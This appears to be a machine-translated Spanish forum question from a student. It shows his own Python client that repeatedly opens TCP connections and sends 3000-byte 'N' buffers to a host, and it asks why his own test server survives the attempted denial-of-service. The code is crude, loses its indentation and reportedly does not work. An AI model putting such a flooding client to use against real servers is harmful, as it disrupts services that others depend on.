Soy un estudiante, así que, por favor, no seas grosero, me olvido de algo y este proyecto es solo para fines de investigación.
Estoy dispuesto a realizar un ataque de denegación de servicio (en mis propios servidores) No estoy dispuesto a hacer el método de script para niños para descargar y ejecutar algunos códigos en línea. He programado mis propios servidores y los clientes aquí es el cliente que envía buffers desbordando los buffers
class BufferOverflow:
def overflow(self,host,port):
id = 0
while True:
print("================================================================")
try:
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print("[*] NetWorker Report: Sockets have been created against the server")
except socket.error:
print("[*] Adim permission required or port in use")
buffer = "\x4e"*3000
print("[*] Connecting to %s on %d"%(host,port))
client.connect((host,port))
print("[*] Connection established")
exploit_packet = ("USV "+buffer+"//n//r//r").encode("UTF-8")
print("[*] Initializing...")
client.send(exploit_packet)
print("[*] Initialized!")
print("[*] Restarting...")
client.close()
print("[*] Restarted!")
print("[*] Session ID: %d"%id)
id+=1
Esto envía buffers al servidor con el deseo deseado, he implementado mi propio sniffer que podría resolver el DNS a I.P para poder obtener el I.P.
Aquí está el código para mi propia implementación de servidores personalizados, enlace
Utilicé un servidor TCP básico de mi código en la revisión del código para probar,
Enlacapturadepantalla,lapartesuperiorizquierdaeselservidorquemuestraelbúfercomo"NNN .... 3000 * N" = > el búfer único que es enviado por el cliente, usé múltiples clientes para exagerar el búfer. Finalmente obtuve el éxito en la parte superior derecha que mostraba este mensaje,
El error Win 10061 no es más que el servidor se ha detenido o está inactivo. Sé que el servicio está disponible para los clientes actuales que he creado, así que abrí una nueva shell de energía junto con los clientes en ejecución y me conecté al servidor, pero el servidor sigue respondiendo, no sé por qué.
¿Me estoy perdiendo algo o esta no es realmente la implementación correcta del ataque de denegación de servicio?
Soy un estudiante y estoy dispuesto a aprender de usted, por favor, no sea grosero. He malinterpretado algunos conceptos y proporcioné una implementación incorrecta